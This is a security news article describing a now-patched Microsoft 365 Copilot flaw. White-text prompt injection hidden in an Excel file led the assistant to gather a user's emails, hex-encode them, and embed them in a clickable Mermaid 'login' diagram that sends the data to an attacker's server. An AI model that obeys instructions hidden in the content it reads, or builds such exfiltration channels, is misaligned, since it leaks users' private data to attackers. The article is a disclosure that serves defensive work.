Data Leak in Microsoft Copilot: Emails Exfiltrated via Hidden Mermaid Diagram
A novel vulnerability was discovered in Microsoft 365 Copilot that permitted covert exfiltration of user data via an innocuous-looking Mermaid flowchart. The flaw lay in Copilot’s handling of a specially crafted document: the assistant could execute concealed instructions and leak confidential information to an attacker by abusing the diagram-rendering and CSS features.
The exploit began when Copilot ingested a document containing an indirect prompt injection—malicious directives camouflaged as ordinary text. During its summarization routine, the assistant dutifully followed these hidden instructions: it searched the corporate environment for the user’s recent emails, encoded fragments of them in hexadecimal, and embedded the resulting data into a “login diagram” written in Mermaid. Visually, the diagram presented itself as a benign “Login” button adorned with a padlock, ostensibly prompting authorization to reveal content. In truth, the diagram concealed a CSS-styled hyperlink pointing to the attacker’s server, into which the encoded email snippets were injected. When a user clicked the button, the data was transmitted to the adversary and could subsequently be decoded.
Mermaid is a markup language for diagrams that supports CSS styling; Copilot’s ability to render such diagrams inline within the chat created the covert channel exploited for the leak. The researcher who demonstrated the issue methodically chained actions—from harvesting emails to generating a clickable artifact that exfiltrated data to a Burp Collaborator endpoint. The proof-of-concept showed that upon clicking the faux login, a frame briefly appeared in the Copilot window displaying the attacker’s server response before vanishing, while the user perceived merely a mock Microsoft sign-in page.
To maximize plausibility, the researcher used indirect prompt injection by embedding hostile instructions as white text inside an Excel file alongside benign data. Copilot, processing the file, interpreted those instructions as a privacy prompt and offered a “login” to view the purported content—thereby combining hidden-instruction injection with Mermaid-based exfiltration.
Microsoft acknowledged the issue and issued a patch that disabled interactive behavior in generated diagrams. After the update, hyperlinks within Mermaid objects are no longer actionable, effectively closing the leak vector. The researcher verified the remediation and commended the company’s rapid response; however, no bounty was awarded under MSRC’s bug-bounty program because Copilot was not officially within the program’s scope.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
